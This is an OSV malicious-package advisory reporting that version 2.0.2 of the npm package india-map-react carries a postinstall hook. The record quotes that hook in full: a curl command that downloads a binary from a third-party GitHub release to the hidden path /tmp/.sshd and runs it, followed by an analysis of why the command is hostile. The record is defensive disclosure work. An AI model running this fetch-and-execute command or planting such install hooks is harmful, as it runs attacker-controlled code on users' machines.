{"id":"MAL-2026-5542","summary":"Malicious code in india-map-react (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2)\nOn `npm install`, the package's postinstall script runs `curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2\u003e/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &`. The fetch disables TLS verification (`-k`), silences errors (`-s` plus `2\u003e/dev/null`), targets a `latest`-tagged (mutable) release on a GitHub account (`parikhpreyash4`) that does not match the npm publisher (`yuvrajDurgesh`), stages the downloaded binary at the hidden path `/tmp/.sshd` to impersonate the SSH daemon, sets it executable, and launches it backgrounded. The package's advertised purpose is a React component for an India map; downloading and executing an unrelated native binary from a third-party GitHub account is unrelated to that purpose. Every installer running `npm install india-map-react@2.0.2` is forced to execute attacker-controlled code on their machine.\n","modified":"2026-06-11T02:31:32.791684110Z","published":"2026-06-11T02:02:37Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-06-11T02:24:28.60266363Z","modified_time":"2026-06-11T02:02:37Z","versions":["2.0.2"],"source":"amazon-inspector","sha256":"52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2","id":"IN-MAL-2026-005374"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/india-map-react/v/2.0.2"}],"affected":[{"package":{"name":"india-map-react","ecosystem":"npm","purl":"pkg:npm/india-map-react"},"versions":["2.0.2"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"filename":"india-map-react-2.0.2.tgz","hashes":{"sha512_sri":"sha512-DScVhBTTQHggJTobf9nTpGyZHe8FdpNrEL/Wdff/yPojHb2DqPyCspPMdBSVrWHNzyucvxONV2ryWBXAV5fkfg==","sha1":"0e634bbd8024744ca88bbbbc92a90a29f0d42ec3"}}],"evidence_files":[{"path":"package.json","tlsh":"2e214923c5119d6309bd11a4ac7a4642f6a61b6f50648c8f31b2a17c5bbb1ef119cb68","sha256":"f421e8a50b0668d8fa2f55bb218756ab57cffad78ae73c6525d40575f402b1f6"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/india-map-react/MAL-2026-5542.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}